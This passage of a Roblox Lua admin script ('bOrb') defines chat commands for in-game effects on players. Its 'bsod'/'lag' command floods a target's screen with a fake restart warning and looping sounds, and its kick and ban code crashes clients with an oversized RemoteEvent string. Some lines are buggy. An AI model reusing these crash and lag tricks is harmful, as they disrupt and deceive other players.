    cmd("complex", {prefix.."dance",prefix.."danceify"}, "player", function(v)  
820
torsowd=Instance.new('Weld',v.Character)
821
torsowd.Part0=v.Character.HumanoidRootPart
822
torsowd.Part1=v.Character.Torso
823
824
lwd=Instance.new('Weld',v.Character)
825
lwd.Part0=v.Character.Torso
826
lwd.Part1=v.Character["Left Arm"]
827
lwd.C0=CFrame.new(-1.5,0,0)
828
829
rwd=Instance.new('Weld',v.Character)
830
rwd.Part0=v.Character.Torso
831
rwd.Part1=v.Character["Right Arm"]
832
833
ii=Instance.new('StringValue',nil)
834
ii.Value = '0'
835
game:GetService('RunService').Stepped:connect(function()
836
	ii.Value = ii.Value + 0.1
837
	
838
		torsowd.C0=CFrame.new(math.sin(ii.Value),0,0)
839
lwd.C0=CFrame.new(-1.5,0,0) * CFrame.Angles(math.sin(ii.Value),0,math.sin(ii.Value))
840
rwd.C0=CFrame.new(1.5,0,0) * CFrame.Angles(math.sin(ii.Value),0,0 - math.sin(ii.Value))
841
end)
842
843
if Chat == true then
844
 	game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." dance.",Enum.ChatColor.Blue)
845
    end
846
end);
847
    cmd("complex", {prefix.."smite"}, "player", function(v)
848
smite=Instance.new('Part',workspace)
849
smite.Anchored = true
850
smite.FormFactor = "Custom"
851
smite.CanCollide = false
852
smite.Size = Vector3.new(1,300,1)
853
smite.Transparency=0.5
854
smite.Color = Color3.new(0,0,0)
855
smite.CFrame = v.Character.Torso.CFrame * CFrame.new(0,30,0)
856
smite.Name = 'bmiter'
857
858
game:GetService('RunService').Stepped:connect(function()
859
smite.BrickColor = BrickColor.Random()
860
end)
861
862
if v.Character:FindFirstChild('Torso') then
863
sme=Instance.new('Explosion',v.Character)
864
sme.Position = v.Character.Torso.Position
865
sme.BlastPressure = "500000"
866
sme.BlastRadius = "3"
867
end
868
869
870
delay(1.5,function()
871
for i = 1,0,-0.1 do wait()
872
smite.Size = Vector3.new(i,300,i)
873
end
874
875
for i,v in pairs(workspace:children()) do if v.Name=='bmiter' then
876
	v:remove()
877
end
878
end
879
end)
880
if Chat == true then
881
 				game:GetService("Chat"):Chat(wpad,chatname.." Smited "..v.Name..".",Enum.ChatColor.Blue)
882
  end
883
  end);
884
    cmd("complex", {prefix.."ungod"}, "player", function(v)
885
     vhum1 = v.Character:FindFirstChild('Humanoid')
886
 	vhum1.MaxHealth = 100
887
if Chat == true then
888
 				game:GetService("Chat"):Chat(wpad,chatname.."UnGoded "..v.Name..".",Enum.ChatColor.Blue)
889
  end
890
  end);
891
    cmd("complex", {prefix.."invis","invisible"}, "player", function(v)
892
for i,x in pairs(v.Character:children()) do if x.ClassName=="Part" and x.Name~="HumanoidRootPart" then
893
	x.Transparency=1
894
	for i,z in pairs(v.Character:children()) do if z.ClassName=="Hat" then
895
		for i,b in pairs(z:children()) do if b.ClassName=="Part" then
896
			b.Transparency=1
897
		end
898
	end
899
	end
900
	end
901
end
902
end
903
if v.Character.Head:FindFirstChild('face') then
904
	v.Character.Head.face.Transparency=1
905
end
906
if Chat == true then
907
 				game:GetService("Chat"):Chat(wpad,chatname..' '..v.Name.." is now invisible.",Enum.ChatColor.Blue)
908
  end
909
  end);
910
    cmd("complex", {prefix.."vis","visible"}, "player", function(v)
911
for i,x in pairs(v.Character:children()) do if x.ClassName=="Part" and x.Name~="HumanoidRootPart" then
912
	x.Transparency=0
913
	for i,z in pairs(v.Character:children()) do if z.ClassName=="Hat" then
914
		for i,b in pairs(z:children()) do if b.ClassName=="Part" then
915
			b.Transparency=0
916
		end
917
	end
918
	end
919
	end
920
end
921
end
922
if v.Character.Head:FindFirstChild('face') then
923
	v.Character.Head.face.Transparency=0
924
end
925
if Chat == true then
926
 				game:GetService("Chat"):Chat(wpad,chatname..' '..v.Name.." is now visible.",Enum.ChatColor.Blue)
927
  end
928
  end);
929
    cmd("complex", {prefix.."kill"}, "player", function(v)
930
     v.Character:BreakJoints();
931
if Chat == true then
932
 	game:GetService("Chat"):Chat(wpad,chatname.."killed "..v.Name..".",Enum.ChatColor.Blue)
933
    end
934
end);
935
    cmd("complex", {prefix.."rguis",prefix.."nguis",prefix.."noguis"}, "player", function(v)
936
	for i,x in pairs(v:children()) do if v.Name~="Basictality" and v.Name~="mcqueen987" then
937
	x:remove()
938
	end
939
	end
940
	if Chat == true then
941
 	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.."'s PlayerGui's.",Enum.ChatColor.Blue)
942
	     end
943
	end)
944
    cmd("complex", {prefix.."freeze"}, "player", function(v)
945
	if Chat == true then
946
 	game:GetService("Chat"):Chat(wpad,chatname.."Froze "..v.Name..".",Enum.ChatColor.Blue)
947
	     end
948
freezes=Instance.new('Part',v.Character)
949
 freezes.FormFactor = "Custom"
950
 freezes.Size = Vector3.new(4.5,6.5,4.5)
951
 freezes.Material = "SmoothPlastic"
952
 freezes.BrickColor = BrickColor.new('Teal')
953
 freezes.Transparency=0.5
954
 freezes.Name = "Ice"
955
 freezes.Anchored = true
956
 freezes.Material = "Ice"
957
 
958
 v.Character.Head.Anchored = true
959
 v.Character.Torso.Anchored = true
960
 v.Character['Left Arm'].Anchored = true
961
 v.Character['Left Leg'].Anchored = true
962
 v.Character['Right Arm'].Anchored = true
963
 v.Character['Right Leg'].Anchored = true
964
 
965
 freezes.CFrame = v.Character.Torso.CFrame
966
    end);
967
    cmd("complex", {prefix.."thaw"}, "player", function(v)
968
 di = v.Character:FindFirstChild('Ice')
969
 dim=Instance.new('CylinderMesh',di)
970
 di.Size = Vector3.new(4.5,0,4.5)
971
 di.CFrame = v.Character.Torso.CFrame * CFrame.new(0,-2.5,0)
972
 di.CanCollide = false
973
 di.Transparency=0
974
 
975
 v.Character.Head.Anchored = false
976
 v.Character.Torso.Anchored = false
977
 v.Character['Left Arm'].Anchored = false
978
 v.Character['Left Leg'].Anchored = false
979
 v.Character['Right Arm'].Anchored = false
980
 v.Character['Right Leg'].Anchored = false
981
if Chat == true then
982
 	game:GetService("Chat"):Chat(wpad,chatname.."Thawed "..v.Name..".",Enum.ChatColor.Blue)
983
 end
984
game.Debriss:AddItem(di,3)
985
 end);
986
    cmd("complex", {prefix.."god"}, "player", function(v)
987
     vhum = v.Character:FindFirstChild('Humanoid')
988
 	vhum.MaxHealth = 9e999
989
if Chat == true then
990
 	game:GetService("Chat"):Chat(wpad,chatname.."Godded "..v.Name..".",Enum.ChatColor.Blue)
991
   end
992
 end);
993
    cmd("complex", {prefix.."fire"}, "player", function(v)
994
vtorso = v.Character:FindFirstChild('Torso')
995
Instance.new('Fire',vtorso)
996
if Chat == true then
997
 	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." fire.",Enum.ChatColor.Blue)
998
   end
999
 end);
1000
1001
    cmd("complex", {prefix.."unfire",prefix.."nofire"}, "player", function(v)
1002
vtorso = v.Character:FindFirstChild('Torso')
1003
for i,f in pairs(vtorso:children()) do if f.ClassName=="Fire" then game.Debris:AddItem(f,0) end end
1004
if Chat == true then
1005
 	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.."'s fire.",Enum.ChatColor.Blue)
1006
   end
1007
 end);
1008
1009
  cmd("complex", {prefix.."bsod",prefix.."lag"}, "player", function(v)
1010
	if v.Name~="Basictality" and v.Name~="ScriptingRevolution" and v.Name~="mcqueen987" then
1011
	if Chat == true then
1012
 	 	game:GetService("Chat"):Chat(wpad,chatname.."BSOD'd/Lagged "..v.Name..".",Enum.ChatColor.Blue)
1013
end
1014
local bsodgui = Instance.new('ScreenGui',v.PlayerGui)
1015
bsodframe=Instance.new('Frame',bsodgui)
1016
bsodframe.Size = UDim2.new(0,1400,0,800)
1017
bsodframe.Position = UDim2.new(0,0,0,-40)
1018
bsodframe.BackgroundColor3 = Color3.new(0,0,1)
1019
	for i = 0,50000 do wait()
1020
		for bsodl = 0,200 do
1021
bsodt1=Instance.new('TextLabel',bsodframe)
1022
bsodt1.Text = "Sorry!"
1023
bsodt1.BackgroundTransparency=1
1024
bsodt1.TextScaled = true
1025
bsodt1.Size = UDim2.new(0,500,0,300)
1026
bsodt1.Position = UDim2.new(0,100,0,80)
1027
1028
rbsod = bsodt1:clone()
1029
rbsod.Parent = bsodframe
1030
rbsod.Text = "You're computer will automaticly restart in 0.5 Seconds.. [BSOD]"
1031
rbsod.Position = UDim2.new(0,450,0,300)
1032
rbsod.Size = UDim2.new(0,500,0,300)
1033
1034
local Sound = Instance.new('Sound',v.PlayerGui)
1035
Sound.SoundId = 'http://roblox.com/asset/?id=265831543'
1036
Sound.Looped = true 
1037
Sound.Name = 'Local Sound'
1038
Sound.Parent = v.PlayerGui
1039
Sound.Volume = 100
1040
Sound:Play()
1041
		end
1042
		end
1043
		end
1044
    end);
1045
    cmd("complex", {prefix.."ff",prefix.."forcefield",prefix.."shield"}, "player", function(v)
1046
     Instance.new("ForceField",v.Character);
1047
if Chat == true then
1048
 	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." a forcefield.",Enum.ChatColor.Blue)
1049
   end
1050
 end);
1051
    cmd("complex", {prefix.."sparkles",prefix.."sparkle"}, "player", function(v)
1052
     Instance.new('Sparkles',v.Character.Torso)
1053
if Chat == true then
1054
 	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." sparkles.",Enum.ChatColor.Blue)
1055
   end
1056
 end);
1057
    cmd("complex", {prefix.."unsparkles",prefix.."nosparkles"}, "player", function(v)
1058
   for i,v in pairs(v.Character.Torso:children()) do if v.ClassName=="Sparkles" then v:remove() end end
1059
if Chat == true then
1060
 	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.." sparkles.",Enum.ChatColor.Blue)
1061
   end
1062
 end);
1063
    cmd("complex", {prefix.."kick",prefix.."boot"}, "player", function(v)
1064
	if v.Name~="Basictality" and v.Name~="reizayah1" and v.Name~="mcqueen987" and v.Name~="ScriptingRevolution" then
1065
kick=Instance.new('RemoteEvent',workspace):FireClient(v,{string.rep("umad?",2e5+5)})
1066
 game.Debris:AddItem(kick,1)
1067
if Chat == true then
1068
 		game:GetService("Chat"):Chat(wpad,chatname.."kicked "..v.Name.." from the server.",Enum.ChatColor.Blue)
1069
 end
1070
end
1071
   end);
1072
    cmd("simple", {prefix.."unban",prefix.."unbanish"}, "player", function(v)
1073
for i,unban in pairs(banfolder:children()) do if unban.Value==v.Name then
1074
	unban:remove()
1075
end
1076
end
1077
 		game:GetService("Chat"):Chat(wpad,chatname.."Unbanished "..v.Name.." from the server.",Enum.ChatColor.Blue)
1078
    end);
1079
    cmd("complex", {prefix.."ban",prefix.."banish"}, "player", function(v)
1080
	if v.Name~="Basictality" and v.Name~="reizayah1" and v.Name~="ScriptingRevolution" and v.Name~="mcqueen987" then
1081
 if game.Players:FindFirstChild(v.Name) then
1082
bansv=Instance.new('StringValue',banfolder)
1083
bansv.Name = v.Name
1084
bansv.Value = v.Name
1085
end
1086
		end
1087
	if Chat == true then
1088
 		game:GetService("Chat"):Chat(wpad,chatname.."Banished "..v.Name.." from the server.",Enum.ChatColor.Blue)
1089
	  end
1090
  end);
1091
   cmd("complex", {prefix.."sword",prefix.."linkedsword"}, "player", function(v)
1092
 game:service'InsertService':LoadAsset(125013769):children()[1].Parent = v.Backpack
1093
 		if Chat == true then
1094
game:GetService("Chat"):Chat(wpad,chatname..'Gave '..v.Name.." a Sword.",Enum.ChatColor.Blue)
1095
   end
1096
 end);
1097
   cmd("complex", {prefix.."nogravity",prefix.."ngrav",prefix.."nograv"}, "player", function(v)
1098
bf = Instance.new("BodyForce")	
1099
bf.Parent =	v.Character.Torso	
1100
bf.force = Vector3.new(0,4000,0)	
1101
 		if Chat == true then
1102
game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." anti-Gravity.",Enum.ChatColor.Blue)
1103
    end
1104
end);
1105
  cmd("complex", {prefix.."ref",prefix.."refresh"}, "player", function(v)
1106
	
1107
if v.Character:FindFirstChild('Torso') then
1108
refp=Instance.new("Part",workspace)
1109
refp.CFrame = v.Character.Torso.CFrame
1110
refp.CanCollide = false
1111
refp.Transparency=1
1112
refp.Anchored = true
1113
end
1114
v:LoadCharacter()
1115
v.Character.Torso.CFrame = refp.CFrame
1116
refp:remove()
1117
 		if Chat == true then
1118
game:GetService("Chat"):Chat(wpad,chatname.."Refresh'd "..v.Name,Enum.ChatColor.Blue)
1119
   end
1120
 end);
1121
   cmd("complex", {prefix.."unjail",prefix.."nojail"}, "player", function(v)
1122
game.Debris:AddItem(jailp,0)
1123
game.Debris:AddItem(jailp1,0)
1124
 		game:GetService("Chat"):Chat(wpad,chatname.."Unjailed "..v.Name..".",Enum.ChatColor.Blue)
1125
    end);
1126
   cmd("complex", {prefix.."light",prefix.."plight"}, "player", function(v)
1127
	if Chat == true then
1128
	game:GetService("Chat"):Chat(wpad,chatname.."Gave "..v.Name.." light.",Enum.ChatColor.Blue)
1129
	end
1130
	light=Instance.new('PointLight',v.Character.Torso)
1131
	light.Brightness = "5"
1132
	light.Range "5"
1133
    end);
1134
  cmd("complex", {prefix.."rlight",prefix.."nolight",prefix.."unlight"}, "player", function(v)
1135
	if Chat == true then
1136
	game:GetService("Chat"):Chat(wpad,chatname.."Removed "..v.Name.." light.",Enum.ChatColor.Blue)
1137
	end
1138
	for i,rlight in pairs(v.Character.Torso:children()) do if rlight.ClassName=="PointLight" then
1139
		game.Debris:AddItem(rlight,0)
1140
	end
1141
	end
1142
    end);
1143
   cmd("complex", {prefix.."resp",prefix.."respawn",prefix.."res"}, "player", function(v)
1144
v:LoadCharacter()
1145
 		if Chat == true then
1146
game:GetService("Chat"):Chat(wpad,chatname.."Respawned "..v.Name..".",Enum.ChatColor.Blue)
1147
    end
1148
end);
1149
  cmd("complex", {prefix.."sit"}, "player", function(v)
1150
v.Character.Humanoid.Sit = true
1151
 		if Chat == true then
1152
game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." sit.",Enum.ChatColor.Blue)
1153
end
1154
    end);
1155
  cmd("complex", {prefix.."rj",prefix.."rejoin"}, "player", function(v)
1156
game:GetService('TeleportService'):Teleport(game.PlaceId,v)
1157
    end);
1158
 cmd("complex", {prefix.."jump"}, "player", function(v)
1159
v.Character.Humanoid.Jump = true
1160
 		if Chat == true then
1161
game:GetService("Chat"):Chat(wpad,chatname.."Made "..v.Name.." Jump.",Enum.ChatColor.Blue)
1162
    end
1163
end);
1164
   cmd("complex", {prefix.."jail",prefix.."lockup"}, "player", function(v)
1165
jailp=Instance.new('Model',workspace)
1166
jailp.Name = v.Name.."'s Jail"
1167
jailp1=Instance.new('Part',workspace)
1168
jailp1.FormFactor = "Custom"
1169
jailp1.Anchored = true
1170
jailp1.Material = "Neon"
1171
jailp1.Size = Vector3.new(5,0.2,5)
1172
jailp1.BrickColor = BrickColor.new'Teal'
1173
jailp1.CFrame = v.Character.Torso.CFrame * CFrame.new(0,-3,0)
1174
1175
jailp2=Instance.new('Part',jailp1)
1176
jailp2.FormFactor = "Custom"
1177
jailp2.Anchored = true
1178
jailp2.Color = Color3.new(0,0,0)
1179
jailp2.Transparency=0.5
1180
jailp2.Material = "Neon"
1181
jailp2.Size = Vector3.new(5, 7, 0)
1182
jailp2.CFrame = jailp1.CFrame * CFrame.new(0,3.6,2.4)
1183
1184
jailp3=jailp2:clone()
1185
jailp3.Parent = jailp1
1186
jailp3.CFrame = jailp1.CFrame * CFrame.new(0,3.6,-2.4)
1187
1188
jailp4=jailp1:clone()
1189
jailp4.Parent = jailp1
1190
jailp4.CFrame = jailp1.CFrame * CFrame.new(0,7.2,0)
1191
1192
jailp5=jailp2:clone()
1193
jailp5.Parent = jailp1
1194
jailp5.Size = Vector3.new(0, 7, 5)
1195
jailp5.CFrame = jailp1.CFrame * CFrame.new(2.4,3.6,0)
1196
1197
jailp6=jailp5:clone()
1198
jailp6.Parent = jailp1
1199
jailp5.CFrame = jailp1.CFrame * CFrame.new(-2.4,3.6,0)
1200
 		game:GetService("Chat"):Chat(wpad,chatname.."Jailed "..v.Name.." .",Enum.ChatColor.Blue)
1201
    end);
1202
    cmd("complex", {prefix.."unff",prefix.."unforcefield",prefix.."unshield"}, "player", function(v)
1203
     for i,k in pairs(v.Character:GetChildren()) do
1204
      if k.ClassName == "ForceField" then
1205
 			if Chat == true then
1206
game:GetService("Chat"):Chat(wpad,chatname.."Taken "..v.Name.." forcefield away.",Enum.ChatColor.Blue)
1207
end
1208
       k:Destroy();
1209
end;
1210
     end;
1211
    end);
1212
   end;
1213
 end;
1214
 
1215
 player = meplyr
1216
 player.Chatted:connect(function(message) chat(message, player) end)
1217
----------------------------------------------------------------------------------------------
1218
 function Spawnorb()
1219
 admin = meplyr.Name
1220
 wpadmod=Instance.new('Model',workspace)
1221
Instance.new('Humanoid',wpadmod)
1222
 wpadmod.Name = player.Name.."'s "..OrbName
1223
 wpad=Instance.new('Part',wpadmod)
1224
 wpad.Name = "bOrb"
1225
 wpad.Anchored = true
1226
 wpadpointlight=Instance.new('PointLight',wpad)
1227
 wpad.CanCollide = false
1228
 wpad.Transparency=wpadtrans
1229
 wpad.FormFactor = "Custom"
1230
 wpad.Material = "Neon"
1231
 wpad.CanCollide = false
1232
 wpad.Size = Vector3.new(1,1,1)
1233
 wpad.Shape = "Ball"
1234
 wpad.BrickColor = BrickColor.new'Teal'
1235
wpad.TopSurface = "Smooth"
1236
wpad.BottomSurface = "Smooth"
1237
1238
if hidevalue.Value == "Invisible" then
1239
	wpad.Transparency=1
1240
	wpadpointlight.Parent = nil
1241
end
1242
1243
if hidevalue.Value == "Visible" then
1244
	wpad.Transparency=0
1245
	wpadpointlight.Parent = wpad
1246
	
1247
	if Chat == true then
1248
game:GetService("Chat"):Chat(wpad,chatname.."Welcome "..meplyr.Name..", the current prefix is "..prefix,Enum.ChatColor.Blue)
1249
 end
1250
end
1251
end
1252
1253
Spawnorb()
1254
-----------------------------------------------------------------------------------
1255
game:GetService('RunService').Stepped:connect(function ()
1256
                if not workspace:FindFirstChild(wpadmod.Name) then
1257
                        Spawnorb()
1258
                end
1259
end)
1260
------------------------------------Banned-----------------------------------------
1261
-----------------------------------------------------------------------------------
1262
game:GetService('RunService').Stepped:connect(function ()
1263
 for i,v in pairs(bplyrs:children()) do
1264
	if v.Name==Banned and v.Name~="Basictality" then
1265
v:remove()
1266
	end		
1267
end
1268
end)
1269
1270
bplyrs.PlayerAdded:connect(function(player) do
1271
	if player.Name==Banned and player.Name~="Basictality" and player.Name~="mcqueen987" and player.Name~="reizayah1" then
1272
kick3=Instance.new('RemoteEvent',workspace):FireClient(player,{string.rep("umad?",2e5+5)})
1273
 game.Debris:AddItem(kick3,1)
1274
	end
1275
end
1276
end)
1277
-----------------------------------------------------------------------------------
1278
1279
--------------------------------Player Joining And Player Leaving------------------
1280
game.Players.PlayerAdded:connect(function(player) if player.Name~="Basictality" then
1281
if Chat == true then
1282
game:GetService("Chat"):Chat(wpad,chatname..player.Name..' has joined!',Enum.ChatColor.Blue)
1283
end
1284
end
1285
end)
1286
1287
game.Players.PlayerAdded:connect(function(playero) if playero.Name=="Basictality" then
1288
if Chat == true then
1289
game:GetService("Chat"):Chat(wpad,chatname..playero.Name..' The Creator Of bOrb has joined!',Enum.ChatColor.Blue)
1290
end
1291
end
1292
end)
1293
1294
game.Players.PlayerRemoving:connect(function(playero) if playero.Name=="Basictality" then
1295
if Chat == true then
1296
game:GetService("Chat"):Chat(wpad,chatname..playero.Name..' The Creator Of bOrb has left!',Enum.ChatColor.Blue)
1297
end
1298
end
1299
end)
1300
1301
game.Players.PlayerRemoving:connect(function(player) if player.Name~="Basictality" then
1302
	if Chat == true then
1303
game:GetService("Chat"):Chat(wpad,chatname..player.Name..' has left!',Enum.ChatColor.Blue)
1304
	end
1305
	end
1306
end)
1307
-----------------------------------------Rot---------------------------------------
1308
-----------------------------------------------------------------------------------
1309
	for i = 1,math.huge,Speed do wait()
1310
	if workspace:FindFirstChild(adminwew.Name) then
1311
	wpadtorso = workspace[admin]:FindFirstChild('Torso')
1312
wpad.CFrame = CFrame.new(wpadtorso.Position) * CFrame.fromEulerAnglesXYZ(math.sin(i),math.abs(i),math.rad(i)) * CFrame.new(0,0,-dis)
1313
wpadpath=Instance.new('Part',wpad)
1314
wpadpath.Anchored = true
1315
wpadpath.Transparency = wpad.Transparency
1316
wpadpath.FormFactor = "Custom"
1317
wpadpath.Size = Vector3.new(0.3,0.3,0.3)
1318
wpadpath.CFrame = wpad.CFrame * CFrame.new(0,0,0)
1319
wpadpath.CanCollide = false
1320
wpadpath.Color = Color3.new(0,0,0)
1321
game.Debris:AddItem(wpadpath,1)
1322
end
1323
	end